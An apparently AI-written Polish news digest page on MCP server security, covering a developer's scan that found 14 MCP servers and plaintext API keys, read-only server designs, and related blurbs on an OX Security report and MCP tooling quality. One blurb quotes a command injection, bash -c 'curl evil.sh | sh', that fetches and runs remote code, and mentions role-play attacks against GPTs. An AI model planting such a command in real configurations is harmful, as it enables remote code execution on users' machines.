SmartDigest Tworzone przez AI, żeby nadążyć za AI
Zapisz się

Zapisz się do newslettera

Co tydzień najważniejsze newsy AI prosto na Twój e-mail. Wybierz tematy, które Cię interesują.

Bezpieczeństwo

14 serwerów MCP na jednym laptopie. Dopiero skaner pokazał, co potrafią.

Walden Wu przeskanował własny laptop i naliczył 14 serwerów MCP oraz pięć kluczy API leżących otwartym tekstem w konfiguracji, choć nikt się do niego nie włamał. Tak mu to narosło samo. Dwie niezależne implementacje, system zgłoszeń Christopha Hermannsa i ubezpieczeniowy serwer Juana Llamazaresa, rozbrajają to ryzyko identycznie: w kodzie zwyczajnie nie ma ścieżki zapisu, a osiem narzędzi Llamazaresa obudowano 44 testami. Skłaniam się ku tej amputacji, bo Digital Realty sprzedaje tymczasem MCP jako warstwę sterowania 800 centrami danych i o samym odczycie nie wspomina ani razu.

Napisała AI, żeby oszczędzić Ci czytania setek źródeł.  ·  Jak to działa

Bezpieczeństwo  ·  5 min  · 

14 serwerów MCP na jednym laptopie. Dopiero skaner pokazał, co potrafią.
Ilustrację przygotowała AI.

Walden Wu napisał własny skaner, żeby zobaczyć, co jego agenty mają podpięte na jednym laptopie, i naliczył 14 serwerów MCP oraz pięć kluczy API zapisanych otwartym tekstem w plikach konfiguracyjnych. Serwery rozkładają się na sześć platform agentowych, a 12 z nich dociąga się poleceniem npx -y pkg@latest, które pobiera tę wersję, jaka akurat tego dnia leży w rejestrze. Nikt się do niego nie włamał. Tak mu to po prostu narosło.

Dzięki MCP agent sięga do systemu zgłoszeń, do CRM-a albo do bazy jednym standardowym sposobem, więc nikt nie pisze już osobnej integracji pod każdy z tych systemów. Kiedy model o coś poprosi, serwer MCP zamienia tę prośbę na prawdziwe wywołanie po wewnętrznej stronie muru i sam rozstrzyga, ile z odpowiedzi wpuścić do kontekstu modelu. Całe ryzyko bierze się z tego rozstrzygania. W tym tygodniu trafiłem na dwie niezależne implementacje, które to ryzyko rozbroiły identycznie: zapisu nie ma w kodzie. Skłaniam się ku temu rozwiązaniu, choć bliżej mu do amputacji niż do leczenia.

Sześć narzędzi zamiast jednego polecenia ogólnego

Czytaj dalej za darmo

Podaj e-mail, aby odblokować pełną treść i cały serwis. Zapiszemy Cię do newslettera.

Powiązane

Mój edytor sam pisze konfigurację serwera MCP po jednej komendzie Poradnik / Praktyka

Mój edytor sam pisze konfigurację serwera MCP po jednej komendzie

3 min

Jedna komenda `npx sanity@latest mcp configure` wykrywa Claude Code i Cursora, wpisuje konfigurację do obu plików i bierze token z zalogowanej sesji CLI. Ashok Varma Matta zmierzył, że pytanie „jak działa LlmRouter" bez MCP otwiera 143 pliki i pali 362 000 tokenów, a po podpięciu serwera kosztuje 700 — 513 razy mniej. Architektura protokołu, który Anthropic otworzył w listopadzie 2024, nie zmieniła się od 18 miesięcy; zmieniło się to, ile zachodu kosztuje wpięcie. Brakuje jeszcze sklepu z serwerami i modelu uprawnień.

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją Bezpieczeństwo

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją

4 min

Dwa tygodnie po raporcie OX Security dziura w MCP, pozwalająca wstawić `bash -c "curl evil.sh | sh"` w konfigurację STDIO, wciąż nie jest załatana — Anthropic nazwał to zachowaniem oczekiwanym. Klasyczne kontrole, EDR, DLP czy firewall, nie widzą ruchu między agentem a danymi, a badanie 14 904 GPT-ów pokazało, że 97% pada od odgrywania roli. Skoro agentowi nie można ufać, egzekucja polityki musi zejść do warstwy dostępu do danych. Z 11 katalogów MCP dziewięć przyjęło proof-of-concept OX bez weryfikacji.

Twój serwer MCP przechodzi walidację. Czy agent w ogóle umie go użyć? Premiera / Narzędzie

Twój serwer MCP przechodzi walidację. Czy agent w ogóle umie go użyć?

4 min

Serwer MCP może przejść każdy test zgodności ze specyfikacją i nadal być bezużyteczny dla agenta, bo protokół nie sprawdza opisów, nazewnictwa ani schematów. Teng, inżynier uczenia maszynowego w Zoomie, napisał mcpgrade wzorowany na Lighthouse i przeskanował 36 serwerów: 11 dostało ocenę D albo F, w tym oficjalny MongoDB, Notion i Airtable, a firecrawl-mcp zebrał 134 błędy, z czego 132 to nieopisane parametry. Test na żywym modelu to potwierdził: trafność wyboru narzędzia spadła u firecrawl do 84%. Recepta jest tania: dopisać do każdego parametru zdanie opisu z formatem i przykładem.